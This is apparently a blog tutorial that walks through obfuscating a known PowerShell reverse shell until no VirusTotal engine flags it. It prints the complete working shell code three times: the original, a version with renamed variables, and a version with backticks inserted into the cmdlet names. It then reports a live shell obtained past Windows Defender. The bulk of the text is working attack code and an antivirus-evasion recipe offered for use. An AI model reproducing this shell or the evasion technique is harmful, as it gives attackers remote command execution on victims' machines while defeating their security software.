
# From Detected to Undetected

### Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do is take a sample that antivirus engines already detect and turn it into one they don't.

> VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed, or to verify against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

### Malicious Sample

Our sample of choice is the "[PowerShell reverse shell](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)", coded by [Nikhil Mittal](https://twitter.com/nikhil_mitt).

```powershell
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()
```

First, let's scan the unmodified sample with VirusTotal to get a baseline before changing anything.

![](/files/Y5yDD6w68TqZUwRDRd6B)

VirusTotal’s [result](https://www.virustotal.com/gui/file/da99610a62673657a8abc2891e0ab53a1a0b4f5c463797977d981e43996b33d4) showed that 18 security vendors detected it. **Let’s play now**.

### Playtime

The easiest first step is to rename the variables to random names.

```powershell
$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (iex $Hekate 2>&1 | Out-String )
$Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()
```

Let's scan it again with our friend.

![](/files/Kh8Le16xb8JZcEYrtmBh)

Fourteen security vendors flagged it as malicious on [VirusTotal](https://www.virustotal.com/gui/file/c85a7aae23e316b6c1b8dddc1a3d1075d19c4858fe2d0d3868b2cf521f7646e4). Hmm, there is progress! With a few changes we lost four detections. Let's continue.

If we go to [details](https://www.virustotal.com/gui/file/c85a7aae23e316b6c1b8dddc1a3d1075d19c4858fe2d0d3868b2cf521f7646e4/details) in VirusTotal’s report, we will find the “Powershell Info” section. We will see that VirusTotal identifies the cmdlets used in our script.

![](/files/1ljWDiC8EFYFfcO2rysQ)

### The magic of \`

Let's try inserting backticks inside the command names and see whether VirusTotal can still catch it.

> PowerShell supports a set of [special character](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_special_characters?view=powershell-7.2) sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as *escape sequences*.
>
> Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the *escape character*.
>
> Escape sequences are only interpreted when contained in double-quoted (`"`) strings.

| Sequence    | Description             |
| ----------- | ----------------------- |
| `` `0 ``    | Null                    |
| `` `a ``    | Alert                   |
| `` `b ``    | Backspace               |
| `` `e ``    | Escape                  |
| `` `f ``    | Form feed               |
| `` `n ``    | New line                |
| `` `r ``    | Carriage return         |
| `` `t ``    | Horizontal tab          |
| `` `u{x} `` | Unicode escape sequence |
| `` `v ``    | Vertical tab            |

So we must be careful where we place the backtick; we don't want to break our commands.

Escaping "a" with a backtick produces the alert character (``who`ami``), and escaping "f" produces a form feed (``ipcon`fig``), so both commands break. Escaping any other character does not break the command: the backtick is simply dropped and the character keeps its literal meaning (the sequences are case-sensitive, so `` `E `` or `` `R `` is not an escape either).

The following screenshot makes this clear.

![](/files/oPReTncw7iJO6yomufPM)

Let's continue and add backticks to our code.

```powershell
$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
$Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()
```

Upload it to VirusTotal again and scan it.

![](/files/diTLM6dDyFbpTERLh3yx)

Really, I'm disappointed! We wanted to play more, but "<mark style="color:green;">No security vendors and no sandboxes flagged this file as malicious</mark>."

![](/files/2aeFKPc6JONalwpfvrrh)

As the result shows, [VirusTotal](https://www.virustotal.com/gui/file/581a677b119ca0b7d31ab2241af151527b08bbfd4b4d8a3400bb572118687214) no longer identifies the cmdlets used in our script! The backtick did the trick.

### Test Time

It's time to run our code against Windows Defender and get a reverse shell, to make sure everything still works correctly.

![Victim's machine](/files/XOLYNdlvsTnY2IsmWT1U)

![Attacker's machine](/files/bRZvNrK80LzImy6z5RP3)

It works fine.

### Closing Words

Sometimes it doesn't take much to evade antivirus software! We bypassed every engine on VirusTotal just by renaming the variables and adding a few backticks to the code, as you saw above.
